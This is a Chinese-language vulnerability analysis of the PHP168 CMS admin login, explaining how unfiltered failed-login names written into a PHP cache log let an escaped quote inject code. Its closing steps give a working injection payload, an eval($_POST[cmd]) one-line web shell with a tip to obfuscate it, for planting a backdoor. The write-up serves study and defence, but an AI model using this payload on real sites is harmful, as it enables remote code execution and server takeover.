PHP168 CMS的一次新异漏洞分析
作者:李丰初
admin/global.php对后台管理的用户名与密码没有任何过滤产生了这个漏洞
if( $_POST[loginname] && $_POST[loginpwd] )
{
if( $webdb[yzImgAdminLogin] ){
if(!get_cookie("yzImgNum")||get_cookie("yzImgNum")!=$yzimg){
die("<A HREF=?>验证码不符合</A>");
}else{
set_cookie("yzImgNum","");
}
}
$rs=$db->get_one("SELECT M.$TB[username] AS username,M.$TB[password] AS password,D.* FROM $TB[table] M LEFT JOIN {$pre}memberdata D ON M.$TB[uid]=D.uid WHERE M.$TB[username]='$_POST[loginname]' ");
if(!$rs){
login_logs($_POST[loginname],$_POST[loginpwd]);
setcookie("Admin",'',0,"/");
die("<A HREF=?>用户不存在</A>");
}elseif( pwd_md5($_POST[loginpwd]) != $rs[password] ){
login_logs($_POST[loginname],$_POST[loginpwd]);
setcookie("Admin",'',0,"/");
die("<A HREF=?>密码不正确</A>");
}elseif(!$rs[uid]){
Add_memberdata($_POST[loginname]);
}else{
login_logs($_POST[loginname],md5($_POST[loginpwd]));
$_COOKIE[Admin]="$rs[uid]\t".mymd5($rs[password]);
//@include(PHP168_PATH."cache/warn.php");
setcookie("Admin",$_COOKIE[Admin],0,"/");
}
}
我们看这一段,
if(!$rs){
login_logs($_POST[loginname],$_POST[loginpwd]);
setcookie("Admin",'',0,"/");
die("<A HREF=?>用户不存在</A>");
}elseif( pwd_md5($_POST[loginpwd]) != $rs[password] ){
如果用户名与密码不对,也一样写入(login_logs),我们跟下这个函数
function login_logs($username,$password){
global $timestamp,$onlineip;
$logdb[]="$username\t$password\t$timestamp\t$onlineip";
@include(PHP168_PATH."cache/adminlogin_logs.php");
$writefile="<?php \r\n";
$jj=0;
foreach($logdb AS $key=>$value){
$jj++;
$writefile.="\$logdb[]=\"$value\";\r\n";
if($jj>200){
break;
}
}
write_file(PHP168_PATH."cache/adminlogin_logs.php",$writefile);
}
漏洞出来了,我们先看这一句,$writefile="<?php \r\n"; $writefile这个变量总是会用PHP文件的"<?php"来开始,也就是说被写入的文件一定是PHP文件,这样子才能被include来使用,关键点了!!!!为了include,这个漏洞就产生了,foreach($logdb AS $key=>$value) 这里是遍历循环一个数组,面这个数组值并不是唯一由登录时传入的用户名与密码产生的数组,而是由include包含的以前登录过的用户名与密码一起联合成的数组!!!就是因为include这里包含,当include里面包含时,如果里面有"\""(反邪扛后面跟一个双引号),那们里面的反邪扛就起作用了,比如里面的数组是
$logdb[]="\"?>;<?phpinfo?> usual 1184814802 192.168.128.192";
当他被include后,就会变成
$logdb[]=""?>;<?phpinfo?> usual 1184814802 192.168.128.192";
这样子就可以B合前面的一个双引了
OK,这个漏洞还是比较有意思的,比一般的SQL注入等有新意思,所以就分析下了.
好我,明白原理了,大家也知道如何利用了吧?
第一次,我们在用户名与密码那里登录分别提交
\"?>;<?eval($_POST[cmd])?> ******( 密码随便乱写)
(最好把<?eval($_POST[cmd])?>先base64再gzdeflate)
第二次我们只要随便输入用户名与密码,就可以成功拿到一个一句话后门了
总结: 文件包含可以让自动过滤掉反邪扛,是php的BUG还是?
PS:此漏洞已经有有公布过,但未公布其中原理,今天无意中看到发现者(忘记是谁了)对此漏洞的描述,加班无聊就分析了下